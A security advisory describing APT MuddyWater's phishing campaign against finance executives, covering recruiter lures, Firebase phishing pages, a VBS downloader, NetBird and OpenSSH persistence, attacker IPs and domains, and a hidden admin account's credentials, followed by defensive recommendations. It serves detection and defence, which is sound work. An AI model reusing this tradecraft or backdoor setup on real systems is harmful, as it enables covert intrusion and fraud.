CFO’s Being Targeted in MuddyWater’s Multi-Stage Phishing Campaign

APT MuddyWater is running a spear-phishing campaign aimed at CFOs and finance executives worldwide. The attack chain involves Firebase-hosted phishing sites with CAPTCHA challenges, malicious VBS scripts, and staged payloads. Attackers abuse legitimate tools such as NetBird and OpenSSH to gain persistence and remote access.

Severity Level: High

Threat Details

1. Initial Access & Infection Vectors
   • Spear-phishing emails impersonating Rothschild & Co recruiters.
   • Victims are directed to Firebase-hosted phishing pages using custom CAPTCHA challenges.
   • Phishing kits feature AES-encrypted redirect logic to evade detection.
2. Payload Delivery:
   • Victims are prompted to download a ZIP file (e.g., F-144822.zip) containing a malicious VBS script (F-144822.vbs).
   • The VBS script downloads secondary payloads from attacker infrastructure (198.46.178[.]135).
   • Payload execution is hidden and staged to reduce detection likelihood.
3. Persistence Mechanisms:
   • Installation of NetBird and OpenSSH services to establish encrypted remote tunnels.
   • Creation of hidden local admin accounts (user / Bs@202122).
   • RDP enabled and firewall rules adjusted to allow external connections.
   • Scheduled tasks created to ensure NetBird restarts on every boot.
   • Deletion of NetBird shortcuts to hide traces from victims.
4. Infrastructure Evolution:
   • Shift observed from 192.3.95.152 to 198.46.178.135 as command-and-control infrastructure.
   • Multiple Firebase and web[.]app domains observed (googl-6c11f[.]firebaseapp[.]com, cloud-233f9[.]firebaseapp[.]com, my-sharepoint-inc[.]com).
   • Evidence of shared phishing kits across multiple domains, featuring French math-based CAPTCHA challenges.
5. Attribution & Overlaps:
   • Overlaps in TTPs and infrastructure strongly link activity to APT MuddyWater.
   • Reuse of the same NetBird setup key, identical service names, and credentialed admin accounts across campaigns.
   • Use of AteraAgent.exe in related campaigns, consistent with MuddyWater’s history of abusing legitimate tools.
6. Immediate Impact
   • CFOs and finance executives are at direct risk of credential theft, persistent remote compromise, and potential financial fraud.
   • Global campaign scope with confirmed targeting across Europe, North America, South America, Africa, and Asia.

Recommendations

1. Audit and restrict legitimate tools such as AteraAgent and Netbird; implement application allowlisting to prevent unauthorized installations.
2. Deploy detections for VBS script execution from temporary directories, creation of suspicious local admin accounts, and Netbird service creation — using EDR/SIEM rules.
3. Strengthen email gateway filtering to block VBS downloaders, ZIP archives, and malicious URLs before reaching the end user.
4. Conduct executive-level phishing training, focusing on spear-phishing with recruiter/job lures.
5. Block the IOCs at their respective controls
   https://www.virustotal.com/gui/collection/514a495e31bc35e8c5d9ae59c4cfe030669f0ed60242f6e33cb01c472e8ce3a4/iocs

Source:

• https://hunt.io/blog/apt-muddywater-deploys-multi-stage-phishing-to-target-cfos

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.